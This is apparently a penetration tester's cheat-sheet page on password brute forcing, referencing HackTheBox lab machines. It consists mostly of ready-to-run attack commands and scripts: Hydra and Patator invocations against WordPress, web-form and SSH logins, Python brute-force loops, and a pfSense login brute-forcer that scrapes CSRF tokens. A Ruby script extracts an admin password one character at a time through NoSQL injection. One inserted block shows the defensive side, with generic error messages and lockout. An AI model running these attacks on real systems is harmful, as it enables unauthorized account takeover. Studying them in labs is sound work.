Hydra Brutes


Last updated 2 years ago


Hydra Brute Force

  • If login attempts return a distinct error such as "Invalid Username", the form tells you whether the user exists.

  • We can brute-force against that error string: Hydra's http-post-form module treats a response containing the text after the last colon as a failed attempt.

  • You could build a keyword list first (if you need one).

  • Wordlists (common passwords)

    • /usr/share/dirb/wordlists/common.txt

    • 10k_most_common.txt ..faster than rockyou, but decent!

    • .. SecLists/Passwords/Leaked-Databases/rockyou.txt

    • .. SecLists/Passwords/twitter-banned.txt ..small list of good pws
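Added example (not code from the page) showing the server side of that first bullet: a login that answers "Invalid username" vs "Invalid password" hands Hydra both its failure string and a username oracle, while the hardened handler answers uniformly and throttles failures per account. The user store, salt, passwords and lockout numbers are constructed for the demo.

```python
import hmac
import hashlib
import time
from collections import defaultdict

# Constructed user store: username -> salted SHA-256 hex digest (demo only).
def _h(pw, salt="demo-salt"):
    return hashlib.sha256((salt + pw).encode()).hexdigest()

USERS = {"admin": _h("correct horse"), "editor": _h("battery staple")}

def login_leaky(user, pw):
    """The pattern Hydra keys on: the failure text reveals whether the
    username exists, so -L users.dic can be run against it first."""
    if user not in USERS:
        return "Invalid username"
    if not hmac.compare_digest(USERS[user], _h(pw)):
        return "Invalid password"
    return "Welcome"

FAILS = defaultdict(list)        # username -> timestamps of failed attempts
MAX_FAILS, WINDOW = 5, 300       # refuse after 5 failures inside 5 minutes

def login_hardened(user, pw, now=None):
    """Same check, one generic message for every failure and a per-account
    failure window, so neither the username nor the lockout leaks."""
    now = time.time() if now is None else now
    recent = [t for t in FAILS[user] if now - t < WINDOW]
    FAILS[user] = recent
    if len(recent) >= MAX_FAILS:
        return "Invalid credentials"           # locked, but same text as a miss
    stored = USERS.get(user, _h("dummy"))      # hash even for unknown users (similar timing)
    if user in USERS and hmac.compare_digest(stored, _h(pw)):
        FAILS.pop(user, None)
        return "Welcome"
    FAILS[user].append(now)
    return "Invalid credentials"
```

Per-account counters alone let an attacker lock users out on purpose, so production code pairs this with per-source throttling or increasing delays.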

---------------------------
wordpress/blog
> hydra -vV -L users.dic -p wedontcare 192.x.x.x http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:=Invalid username"
> hydra -vV -l admin -P dict.txt -f -t 2 10.x.x.x http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username"
> hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x http-post-form "/department/login.php:username=^USER^&password=^PASS^&Login=Login:Invalid Password!"
> hydra -vV -l admin -P rockyou.txt -f -t 2 10.x.x.x https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true&Login=Login:Incorrect"
> hydra -vV -l admin -P /usr/share/wordlists/rockyou.txt -f -t 64 10.x.x.x http-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect"
---------------------------

web-form-login
> hydra -t 1 -l admin -P common.txt -vV http-get://192.x.x.x/admin
> hydra -t 1 -l admin -P rockyou.txt -vV http-get://192.x.x.x/nibbleblog/admin.php

---------------------------
ssh
hydra -L users.txt -P pass.txt ssh://10.x.x.x

-t 64  ..raises the number of parallel tasks (default 16) if you want to speed things up

Trim your wordlist

  • Example: pull every entry containing 'nibble' out of rockyou and try ONLY those

grep -i nibble /opt/.../rockyou.txt > mydict.txt

Patator

patator http_fuzz url="http://10.10.10.43/department/login.php" \
  method=POST body='username=admin&password=FILE0' 0=rockyou.txt \
  follow=1 accept_cookie=1 \
  -x ignore:fgrep='Invalid Password!' \
  -x quit:fgrep='Hi admin'

patator http_fuzz url="https://10.10.10.43/db/index.php" \
  method=POST body='password=FILE0&login=Log+In&proc_login=true' 0=rockyou.txt \
  follow=1 accept_cookie=1 \
  -x ignore:fgrep='Incorrect password.' \
  -x quit:fgrep='test'

Python Brute Force Starter Script:

sudo apt-get install python
sudo apt-get install python-pip
pip install requests

import requests as rq
req = rq.get("http://xyz.com/login.php?pass=1234")
print(req.text)

Python Brute Loop:

import requests as rq
for i in range(1300,99999):
    req = rq.get("http://xyz.com/login.php?pass="+str(i))
    if "Wrong pass" in req.text:
        print("Attempt #%d" % i)
    else:
        print("\n\nSuccess!\nPassword: %d" % i)
        break

Ruby Brute Loop

  • Test every character of the charset to see whether it matches the next position of the secret, building the value up one character at a time

--------------------
Goal:
5b317d17-3ee3-4865-8605-bb579f58c10a

--------------------
Loop every character, extending the prefix once one matches:
a
b
c
ca
cb
cc

--------------------
Need 'httparty' module
>> sudo gem install httparty
>> vi expl.rb

--------------------
require 'httparty'
URL = "mymongo.com"

# Boolean oracle: the search value is injected into the app's server-side query,
# so the results page lists ">admin<" only when admin's password matches /^str/.
def check?(str)
  resp = HTTParty.get("http://#{URL}/?search=admin' %26%26 this.password.match(/^#{str}/)%00")
  return resp.body =~ />admin</
end
#puts check?("5").inspect
#puts check?("a").inspect

CHARSET = ('a'..'z').to_a + ('0'..'9').to_a + ['-']
password = ""

# Grow the known prefix one character at a time. check? already anchors the
# regex with ^, so the candidate prefix is passed as-is. Stop once no character
# extends the prefix, i.e. the whole value has been recovered.
loop do
  before = password
  CHARSET.each do |c|
    puts "Trying: #{c} for #{password}"
    test = password + c
    if check?(test)
      password += c
      puts password
      break
    end
  end
  break if password == before
end
puts "Recovered: #{password}"

--------------------
Note:
^5       ..regex anchored at the start: matches only if the value starts with 5
>admin<  ..used this because the success page showed the name between > < tags
"5" and "aaa" were used as yes/no test inputs to confirm the oracle works

Brute CSRF Python

  • Scrape the page and get the csrf token

import re
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)   # quiet self-signed cert warnings

# pfSense prints the token into the page as: var csrfMagicToken = "sid:...";
re_csrf = r'csrfMagicToken = "(.*?)"'
s = requests.session()
with open('passwords.txt') as lines:
    for password in lines:
        password = password.rstrip('\n')
        r = s.post('http://127.0.0.1/index.php')            # fetch a page to get a fresh token
        tokens = re.findall(re_csrf, r.text)
        if not tokens:
            print("No csrfMagicToken in response; check re_csrf against the page source")
            break
        csrf = tokens[0]
        login = {'__csrf_magic': csrf, 'usernamefld': 'rohit', 'passwordfld': password, 'login': 'login'}
        r = s.post('http://127.0.0.1/index.php', data=login)
        if 'Dashboard' in r.text:
            print("Valid Login %s:%s" % ("rohit", password))
            break
        print("Failed")
        s.cookies.clear()                                     # new session for the next attempt
#print(r.text)
#print(csrf)

execute:
python3 bf-pf.py


Ruby Script for passwords on

REF: SenseHTB ippsec,
